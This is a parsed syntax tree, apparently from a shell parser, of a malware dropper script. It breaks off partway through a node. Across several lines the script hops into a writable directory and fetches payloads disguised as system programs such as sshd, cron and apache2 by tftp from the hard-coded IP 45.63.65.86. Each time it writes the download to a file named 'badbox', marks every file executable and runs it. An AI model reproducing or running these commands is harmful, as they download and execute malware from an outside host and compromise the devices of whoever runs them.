CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 168), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 131), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 116), word='ntpd'),
    WordNode(lineno=4, pos=(117, 119), word='-g'),
    WordNode(lineno=4, pos=(120, 131), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(131, 132)),
  CommandNode(lineno=4, pos=(132, 148), parts=[
    WordNode(lineno=4, pos=(132, 135), word='cat'),
    WordNode(lineno=4, pos=(136, 140), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(142, 148), word='badbox'), pos=(141, 148), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(148, 149)),
  CommandNode(lineno=4, pos=(149, 159), parts=[
    WordNode(lineno=4, pos=(149, 154), word='chmod'),
    WordNode(lineno=4, pos=(155, 157), word='+x'),
    WordNode(lineno=4, pos=(158, 159), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(159, 160)),
  CommandNode(lineno=4, pos=(160, 168), parts=[
    WordNode(lineno=4, pos=(160, 168), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(169, 288), parts=[
  CommandNode(lineno=5, pos=(169, 176), parts=[
    WordNode(lineno=5, pos=(169, 171), word='cd'),
    WordNode(lineno=5, pos=(172, 176), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(177, 179)),
  CommandNode(lineno=5, pos=(180, 191), parts=[
    WordNode(lineno=5, pos=(180, 182), word='cd'),
    WordNode(lineno=5, pos=(183, 191), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(192, 194)),
  CommandNode(lineno=5, pos=(195, 202), parts=[
    WordNode(lineno=5, pos=(195, 197), word='cd'),
    WordNode(lineno=5, pos=(198, 202), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(203, 205)),
  CommandNode(lineno=5, pos=(206, 214), parts=[
    WordNode(lineno=5, pos=(206, 208), word='cd'),
    WordNode(lineno=5, pos=(209, 214), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(215, 217)),
  CommandNode(lineno=5, pos=(218, 222), parts=[
    WordNode(lineno=5, pos=(218, 220), word='cd'),
    WordNode(lineno=5, pos=(221, 222), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(222, 223)),
  CommandNode(lineno=5, pos=(224, 251), parts=[
    WordNode(lineno=5, pos=(224, 228), word='tftp'),
    WordNode(lineno=5, pos=(229, 231), word='-r'),
    WordNode(lineno=5, pos=(232, 236), word='sshd'),
    WordNode(lineno=5, pos=(237, 239), word='-g'),
    WordNode(lineno=5, pos=(240, 251), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(251, 252)),
  CommandNode(lineno=5, pos=(252, 268), parts=[
    WordNode(lineno=5, pos=(252, 255), word='cat'),
    WordNode(lineno=5, pos=(256, 260), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(262, 268), word='badbox'), pos=(261, 268), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(268, 269)),
  CommandNode(lineno=5, pos=(269, 279), parts=[
    WordNode(lineno=5, pos=(269, 274), word='chmod'),
    WordNode(lineno=5, pos=(275, 277), word='+x'),
    WordNode(lineno=5, pos=(278, 279), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(279, 280)),
  CommandNode(lineno=5, pos=(280, 288), parts=[
    WordNode(lineno=5, pos=(280, 288), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(289, 414), parts=[
  CommandNode(lineno=6, pos=(289, 296), parts=[
    WordNode(lineno=6, pos=(289, 291), word='cd'),
    WordNode(lineno=6, pos=(292, 296), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(297, 299)),
  CommandNode(lineno=6, pos=(300, 311), parts=[
    WordNode(lineno=6, pos=(300, 302), word='cd'),
    WordNode(lineno=6, pos=(303, 311), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(312, 314)),
  CommandNode(lineno=6, pos=(315, 322), parts=[
    WordNode(lineno=6, pos=(315, 317), word='cd'),
    WordNode(lineno=6, pos=(318, 322), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(323, 325)),
  CommandNode(lineno=6, pos=(326, 334), parts=[
    WordNode(lineno=6, pos=(326, 328), word='cd'),
    WordNode(lineno=6, pos=(329, 334), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(335, 337)),
  CommandNode(lineno=6, pos=(338, 342), parts=[
    WordNode(lineno=6, pos=(338, 340), word='cd'),
    WordNode(lineno=6, pos=(341, 342), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(342, 343)),
  CommandNode(lineno=6, pos=(344, 374), parts=[
    WordNode(lineno=6, pos=(344, 348), word='tftp'),
    WordNode(lineno=6, pos=(349, 351), word='-r'),
    WordNode(lineno=6, pos=(352, 359), word='openssh'),
    WordNode(lineno=6, pos=(360, 362), word='-g'),
    WordNode(lineno=6, pos=(363, 374), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(374, 375)),
  CommandNode(lineno=6, pos=(375, 394), parts=[
    WordNode(lineno=6, pos=(375, 378), word='cat'),
    WordNode(lineno=6, pos=(379, 386), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(388, 394), word='badbox'), pos=(387, 394), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(394, 395)),
  CommandNode(lineno=6, pos=(395, 405), parts=[
    WordNode(lineno=6, pos=(395, 400), word='chmod'),
    WordNode(lineno=6, pos=(401, 403), word='+x'),
    WordNode(lineno=6, pos=(404, 405), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(405, 406)),
  CommandNode(lineno=6, pos=(406, 414), parts=[
    WordNode(lineno=6, pos=(406, 414), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(415, 534), parts=[
  CommandNode(lineno=7, pos=(415, 422), parts=[
    WordNode(lineno=7, pos=(415, 417), word='cd'),
    WordNode(lineno=7, pos=(418, 422), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(423, 425)),
  CommandNode(lineno=7, pos=(426, 437), parts=[
    WordNode(lineno=7, pos=(426, 428), word='cd'),
    WordNode(lineno=7, pos=(429, 437), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(438, 440)),
  CommandNode(lineno=7, pos=(441, 448), parts=[
    WordNode(lineno=7, pos=(441, 443), word='cd'),
    WordNode(lineno=7, pos=(444, 448), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(449, 451)),
  CommandNode(lineno=7, pos=(452, 460), parts=[
    WordNode(lineno=7, pos=(452, 454), word='cd'),
    WordNode(lineno=7, pos=(455, 460), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(461, 463)),
  CommandNode(lineno=7, pos=(464, 468), parts=[
    WordNode(lineno=7, pos=(464, 466), word='cd'),
    WordNode(lineno=7, pos=(467, 468), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(468, 469)),
  CommandNode(lineno=7, pos=(470, 497), parts=[
    WordNode(lineno=7, pos=(470, 474), word='tftp'),
    WordNode(lineno=7, pos=(475, 477), word='-r'),
    WordNode(lineno=7, pos=(478, 482), word='bash'),
    WordNode(lineno=7, pos=(483, 485), word='-g'),
    WordNode(lineno=7, pos=(486, 497), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(497, 498)),
  CommandNode(lineno=7, pos=(498, 514), parts=[
    WordNode(lineno=7, pos=(498, 501), word='cat'),
    WordNode(lineno=7, pos=(502, 506), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(508, 514), word='badbox'), pos=(507, 514), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(514, 515)),
  CommandNode(lineno=7, pos=(515, 525), parts=[
    WordNode(lineno=7, pos=(515, 520), word='chmod'),
    WordNode(lineno=7, pos=(521, 523), word='+x'),
    WordNode(lineno=7, pos=(524, 525), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(525, 526)),
  CommandNode(lineno=7, pos=(526, 534), parts=[
    WordNode(lineno=7, pos=(526, 534), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(535, 654), parts=[
  CommandNode(lineno=8, pos=(535, 542), parts=[
    WordNode(lineno=8, pos=(535, 537), word='cd'),
    WordNode(lineno=8, pos=(538, 542), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(543, 545)),
  CommandNode(lineno=8, pos=(546, 557), parts=[
    WordNode(lineno=8, pos=(546, 548), word='cd'),
    WordNode(lineno=8, pos=(549, 557), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(558, 560)),
  CommandNode(lineno=8, pos=(561, 568), parts=[
    WordNode(lineno=8, pos=(561, 563), word='cd'),
    WordNode(lineno=8, pos=(564, 568), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(569, 571)),
  CommandNode(lineno=8, pos=(572, 580), parts=[
    WordNode(lineno=8, pos=(572, 574), word='cd'),
    WordNode(lineno=8, pos=(575, 580), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(581, 583)),
  CommandNode(lineno=8, pos=(584, 588), parts=[
    WordNode(lineno=8, pos=(584, 586), word='cd'),
    WordNode(lineno=8, pos=(587, 588), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(588, 589)),
  CommandNode(lineno=8, pos=(590, 617), parts=[
    WordNode(lineno=8, pos=(590, 594), word='tftp'),
    WordNode(lineno=8, pos=(595, 597), word='-r'),
    WordNode(lineno=8, pos=(598, 602), word='tftp'),
    WordNode(lineno=8, pos=(603, 605), word='-g'),
    WordNode(lineno=8, pos=(606, 617), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(617, 618)),
  CommandNode(lineno=8, pos=(618, 634), parts=[
    WordNode(lineno=8, pos=(618, 621), word='cat'),
    WordNode(lineno=8, pos=(622, 626), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(628, 634), word='badbox'), pos=(627, 634), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(634, 635)),
  CommandNode(lineno=8, pos=(635, 645), parts=[
    WordNode(lineno=8, pos=(635, 640), word='chmod'),
    WordNode(lineno=8, pos=(641, 643), word='+x'),
    WordNode(lineno=8, pos=(644, 645), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(645, 646)),
  CommandNode(lineno=8, pos=(646, 654), parts=[
    WordNode(lineno=8, pos=(646, 654), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(655, 774), parts=[
  CommandNode(lineno=9, pos=(655, 662), parts=[
    WordNode(lineno=9, pos=(655, 657), word='cd'),
    WordNode(lineno=9, pos=(658, 662), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(663, 665)),
  CommandNode(lineno=9, pos=(666, 677), parts=[
    WordNode(lineno=9, pos=(666, 668), word='cd'),
    WordNode(lineno=9, pos=(669, 677), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(678, 680)),
  CommandNode(lineno=9, pos=(681, 688), parts=[
    WordNode(lineno=9, pos=(681, 683), word='cd'),
    WordNode(lineno=9, pos=(684, 688), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(689, 691)),
  CommandNode(lineno=9, pos=(692, 700), parts=[
    WordNode(lineno=9, pos=(692, 694), word='cd'),
    WordNode(lineno=9, pos=(695, 700), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(701, 703)),
  CommandNode(lineno=9, pos=(704, 708), parts=[
    WordNode(lineno=9, pos=(704, 706), word='cd'),
    WordNode(lineno=9, pos=(707, 708), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(708, 709)),
  CommandNode(lineno=9, pos=(710, 737), parts=[
    WordNode(lineno=9, pos=(710, 714), word='tftp'),
    WordNode(lineno=9, pos=(715, 717), word='-r'),
    WordNode(lineno=9, pos=(718, 722), word='wget'),
    WordNode(lineno=9, pos=(723, 725), word='-g'),
    WordNode(lineno=9, pos=(726, 737), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(737, 738)),
  CommandNode(lineno=9, pos=(738, 754), parts=[
    WordNode(lineno=9, pos=(738, 741), word='cat'),
    WordNode(lineno=9, pos=(742, 746), word='wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(748, 754), word='badbox'), pos=(747, 754), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(754, 755)),
  CommandNode(lineno=9, pos=(755, 765), parts=[
    WordNode(lineno=9, pos=(755, 760), word='chmod'),
    WordNode(lineno=9, pos=(761, 763), word='+x'),
    WordNode(lineno=9, pos=(764, 765), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(765, 766)),
  CommandNode(lineno=9, pos=(766, 774), parts=[
    WordNode(lineno=9, pos=(766, 774), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(775, 894), parts=[
  CommandNode(lineno=10, pos=(775, 782), parts=[
    WordNode(lineno=10, pos=(775, 777), word='cd'),
    WordNode(lineno=10, pos=(778, 782), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(783, 785)),
  CommandNode(lineno=10, pos=(786, 797), parts=[
    WordNode(lineno=10, pos=(786, 788), word='cd'),
    WordNode(lineno=10, pos=(789, 797), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(798, 800)),
  CommandNode(lineno=10, pos=(801, 808), parts=[
    WordNode(lineno=10, pos=(801, 803), word='cd'),
    WordNode(lineno=10, pos=(804, 808), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(809, 811)),
  CommandNode(lineno=10, pos=(812, 820), parts=[
    WordNode(lineno=10, pos=(812, 814), word='cd'),
    WordNode(lineno=10, pos=(815, 820), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(821, 823)),
  CommandNode(lineno=10, pos=(824, 828), parts=[
    WordNode(lineno=10, pos=(824, 826), word='cd'),
    WordNode(lineno=10, pos=(827, 828), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(828, 829)),
  CommandNode(lineno=10, pos=(830, 857), parts=[
    WordNode(lineno=10, pos=(830, 834), word='tftp'),
    WordNode(lineno=10, pos=(835, 837), word='-r'),
    WordNode(lineno=10, pos=(838, 842), word='cron'),
    WordNode(lineno=10, pos=(843, 845), word='-g'),
    WordNode(lineno=10, pos=(846, 857), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(857, 858)),
  CommandNode(lineno=10, pos=(858, 874), parts=[
    WordNode(lineno=10, pos=(858, 861), word='cat'),
    WordNode(lineno=10, pos=(862, 866), word='cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(868, 874), word='badbox'), pos=(867, 874), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(874, 875)),
  CommandNode(lineno=10, pos=(875, 885), parts=[
    WordNode(lineno=10, pos=(875, 880), word='chmod'),
    WordNode(lineno=10, pos=(881, 883), word='+x'),
    WordNode(lineno=10, pos=(884, 885), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(885, 886)),
  CommandNode(lineno=10, pos=(886, 894), parts=[
    WordNode(lineno=10, pos=(886, 894), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(895, 1012), parts=[
  CommandNode(lineno=11, pos=(895, 902), parts=[
    WordNode(lineno=11, pos=(895, 897), word='cd'),
    WordNode(lineno=11, pos=(898, 902), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(903, 905)),
  CommandNode(lineno=11, pos=(906, 917), parts=[
    WordNode(lineno=11, pos=(906, 908), word='cd'),
    WordNode(lineno=11, pos=(909, 917), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(918, 920)),
  CommandNode(lineno=11, pos=(921, 928), parts=[
    WordNode(lineno=11, pos=(921, 923), word='cd'),
    WordNode(lineno=11, pos=(924, 928), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(929, 931)),
  CommandNode(lineno=11, pos=(932, 940), parts=[
    WordNode(lineno=11, pos=(932, 934), word='cd'),
    WordNode(lineno=11, pos=(935, 940), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(941, 943)),
  CommandNode(lineno=11, pos=(944, 948), parts=[
    WordNode(lineno=11, pos=(944, 946), word='cd'),
    WordNode(lineno=11, pos=(947, 948), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(948, 949)),
  CommandNode(lineno=11, pos=(950, 976), parts=[
    WordNode(lineno=11, pos=(950, 954), word='tftp'),
    WordNode(lineno=11, pos=(955, 957), word='-r'),
    WordNode(lineno=11, pos=(958, 961), word='ftp'),
    WordNode(lineno=11, pos=(962, 964), word='-g'),
    WordNode(lineno=11, pos=(965, 976), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(976, 977)),
  CommandNode(lineno=11, pos=(977, 992), parts=[
    WordNode(lineno=11, pos=(977, 980), word='cat'),
    WordNode(lineno=11, pos=(981, 984), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(986, 992), word='badbox'), pos=(985, 992), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(992, 993)),
  CommandNode(lineno=11, pos=(993, 1003), parts=[
    WordNode(lineno=11, pos=(993, 998), word='chmod'),
    WordNode(lineno=11, pos=(999, 1001), word='+x'),
    WordNode(lineno=11, pos=(1002, 1003), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1003, 1004)),
  CommandNode(lineno=11, pos=(1004, 1012), parts=[
    WordNode(lineno=11, pos=(1004, 1012), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1013, 1132), parts=[
  CommandNode(lineno=12, pos=(1013, 1020), parts=[
    WordNode(lineno=12, pos=(1013, 1015), word='cd'),
    WordNode(lineno=12, pos=(1016, 1020), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1021, 1023)),
  CommandNode(lineno=12, pos=(1024, 1035), parts=[
    WordNode(lineno=12, pos=(1024, 1026), word='cd'),
    WordNode(lineno=12, pos=(1027, 1035), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1036, 1038)),
  CommandNode(lineno=12, pos=(1039, 1046), parts=[
    WordNode(lineno=12, pos=(1039, 1041), word='cd'),
    WordNode(lineno=12, pos=(1042, 1046), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1047, 1049)),
  CommandNode(lineno=12, pos=(1050, 1058), parts=[
    WordNode(lineno=12, pos=(1050, 1052), word='cd'),
    WordNode(lineno=12, pos=(1053, 1058), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1059, 1061)),
  CommandNode(lineno=12, pos=(1062, 1066), parts=[
    WordNode(lineno=12, pos=(1062, 1064), word='cd'),
    WordNode(lineno=12, pos=(1065, 1066), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1066, 1067)),
  CommandNode(lineno=12, pos=(1068, 1095), parts=[
    WordNode(lineno=12, pos=(1068, 1072), word='tftp'),
    WordNode(lineno=12, pos=(1073, 1075), word='-r'),
    WordNode(lineno=12, pos=(1076, 1080), word='pftp'),
    WordNode(lineno=12, pos=(1081, 1083), word='-g'),
    WordNode(lineno=12, pos=(1084, 1095), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1095, 1096)),
  CommandNode(lineno=12, pos=(1096, 1112), parts=[
    WordNode(lineno=12, pos=(1096, 1099), word='cat'),
    WordNode(lineno=12, pos=(1100, 1104), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1106, 1112), word='badbox'), pos=(1105, 1112), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1112, 1113)),
  CommandNode(lineno=12, pos=(1113, 1123), parts=[
    WordNode(lineno=12, pos=(1113, 1118), word='chmod'),
    WordNode(lineno=12, pos=(1119, 1121), word='+x'),
    WordNode(lineno=12, pos=(1122, 1123), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1123, 1124)),
  CommandNode(lineno=12, pos=(1124, 1132), parts=[
    WordNode(lineno=12, pos=(1124, 1132), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1133, 1248), parts=[
  CommandNode(lineno=13, pos=(1133, 1140), parts=[
    WordNode(lineno=13, pos=(1133, 1135), word='cd'),
    WordNode(lineno=13, pos=(1136, 1140), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1141, 1143)),
  CommandNode(lineno=13, pos=(1144, 1155), parts=[
    WordNode(lineno=13, pos=(1144, 1146), word='cd'),
    WordNode(lineno=13, pos=(1147, 1155), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1156, 1158)),
  CommandNode(lineno=13, pos=(1159, 1166), parts=[
    WordNode(lineno=13, pos=(1159, 1161), word='cd'),
    WordNode(lineno=13, pos=(1162, 1166), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1167, 1169)),
  CommandNode(lineno=13, pos=(1170, 1178), parts=[
    WordNode(lineno=13, pos=(1170, 1172), word='cd'),
    WordNode(lineno=13, pos=(1173, 1178), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1179, 1181)),
  CommandNode(lineno=13, pos=(1182, 1186), parts=[
    WordNode(lineno=13, pos=(1182, 1184), word='cd'),
    WordNode(lineno=13, pos=(1185, 1186), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1186, 1187)),
  CommandNode(lineno=13, pos=(1188, 1213), parts=[
    WordNode(lineno=13, pos=(1188, 1192), word='tftp'),
    WordNode(lineno=13, pos=(1193, 1195), word='-r'),
    WordNode(lineno=13, pos=(1196, 1198), word='sh'),
    WordNode(lineno=13, pos=(1199, 1201), word='-g'),
    WordNode(lineno=13, pos=(1202, 1213), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1213, 1214)),
  CommandNode(lineno=13, pos=(1214, 1228), parts=[
    WordNode(lineno=13, pos=(1214, 1217), word='cat'),
    WordNode(lineno=13, pos=(1218, 1220), word='sh'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1222, 1228), word='badbox'), pos=(1221, 1228), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1228, 1229)),
  CommandNode(lineno=13, pos=(1229, 1239), parts=[
    WordNode(lineno=13, pos=(1229, 1234), word='chmod'),
    WordNode(lineno=13, pos=(1235, 1237), word='+x'),
    WordNode(lineno=13, pos=(1238, 1239), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1239, 1240)),
  CommandNode(lineno=13, pos=(1240, 1248), parts=[
    WordNode(lineno=13, pos=(1240, 1248), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1249, 1370), parts=[
  CommandNode(lineno=14, pos=(1249, 1256), parts=[
    WordNode(lineno=14, pos=(1249, 1251), word='cd'),
    WordNode(lineno=14, pos=(1252, 1256), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1257, 1259)),
  CommandNode(lineno=14, pos=(1260, 1271), parts=[
    WordNode(lineno=14, pos=(1260, 1262), word='cd'),
    WordNode(lineno=14, pos=(1263, 1271), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1272, 1274)),
  CommandNode(lineno=14, pos=(1275, 1282), parts=[
    WordNode(lineno=14, pos=(1275, 1277), word='cd'),
    WordNode(lineno=14, pos=(1278, 1282), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1283, 1285)),
  CommandNode(lineno=14, pos=(1286, 1294), parts=[
    WordNode(lineno=14, pos=(1286, 1288), word='cd'),
    WordNode(lineno=14, pos=(1289, 1294), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1295, 1297)),
  CommandNode(lineno=14, pos=(1298, 1302), parts=[
    WordNode(lineno=14, pos=(1298, 1300), word='cd'),
    WordNode(lineno=14, pos=(1301, 1302), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1302, 1303)),
  CommandNode(lineno=14, pos=(1304, 1332), parts=[
    WordNode(lineno=14, pos=(1304, 1308), word='tftp'),
    WordNode(lineno=14, pos=(1309, 1311), word='-r'),
    WordNode(lineno=14, pos=(1312, 1317), word='[cpu]'),
    WordNode(lineno=14, pos=(1318, 1320), word='-g'),
    WordNode(lineno=14, pos=(1321, 1332), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1332, 1333)),
  CommandNode(lineno=14, pos=(1333, 1350), parts=[
    WordNode(lineno=14, pos=(1333, 1336), word='cat'),
    WordNode(lineno=14, pos=(1337, 1342), word='[cpu]'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1344, 1350), word='badbox'), pos=(1343, 1350), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1350, 1351)),
  CommandNode(lineno=14, pos=(1351, 1361), parts=[
    WordNode(lineno=14, pos=(1351, 1356), word='chmod'),
    WordNode(lineno=14, pos=(1357, 1359), word='+x'),
    WordNode(lineno=14, pos=(1360, 1361), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1361, 1362)),
  CommandNode(lineno=14, pos=(1362, 1370), parts=[
    WordNode(lineno=14, pos=(1362, 1370), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1371, 1496), parts=[
  CommandNode(lineno=15, pos=(1371, 1378), parts=[
    WordNode(lineno=15, pos=(1371, 1373), word='cd'),
    WordNode(lineno=15, pos=(1374, 1378), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1379, 1381)),
  CommandNode(lineno=15, pos=(1382, 1393), parts=[
    WordNode(lineno=15, pos=(1382, 1384), word='cd'),
    WordNode(lineno=15, pos=(1385, 1393), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1394, 1396)),
  CommandNode(lineno=15, pos=(1397, 1404), parts=[
    WordNode(lineno=15, pos=(1397, 1399), word='cd'),
    WordNode(lineno=15, pos=(1400, 1404), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1405, 1407)),
  CommandNode(lineno=15, pos=(1408, 1416), parts=[
    WordNode(lineno=15, pos=(1408, 1410), word='cd'),
    WordNode(lineno=15, pos=(1411, 1416), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1417, 1419)),
  CommandNode(lineno=15, pos=(1420, 1424), parts=[
    WordNode(lineno=15, pos=(1420, 1422), word='cd'),
    WordNode(lineno=15, pos=(1423, 1424), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1424, 1425)),
  CommandNode(lineno=15, pos=(1426, 1456), parts=[
    WordNode(lineno=15, pos=(1426, 1430), word='tftp'),
    WordNode(lineno=15, pos=(1431, 1433), word='-r'),
    WordNode(lineno=15, pos=(1434, 1441), word='apache2'),
    WordNode(lineno=15, pos=(1442, 1444), word='-g'),
    WordNode(lineno=15, pos=(1445, 1456), word='45.63.65.86'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1456, 1457)),
  CommandNode(lineno=15, pos=(1457, 1476), parts=[
    WordNode(lineno=15, pos=(1457, 1460), word='cat'),
    WordNode(lineno=15, pos=(1461, 1468), word='apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1470, 1476), word='badbox'), pos=(1469, 1476), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1476, 1477)),
  CommandNode(lineno=15, pos=(1477, 1487), parts=[
    WordNode(lineno=15, pos=(1477, 1482), word='chmod'),
    WordNode(lineno=15, pos=(1483, 1485), word='+x'),
    WordNode(lineno=15, pos=(1486, 1487), word='*'),
  ]),
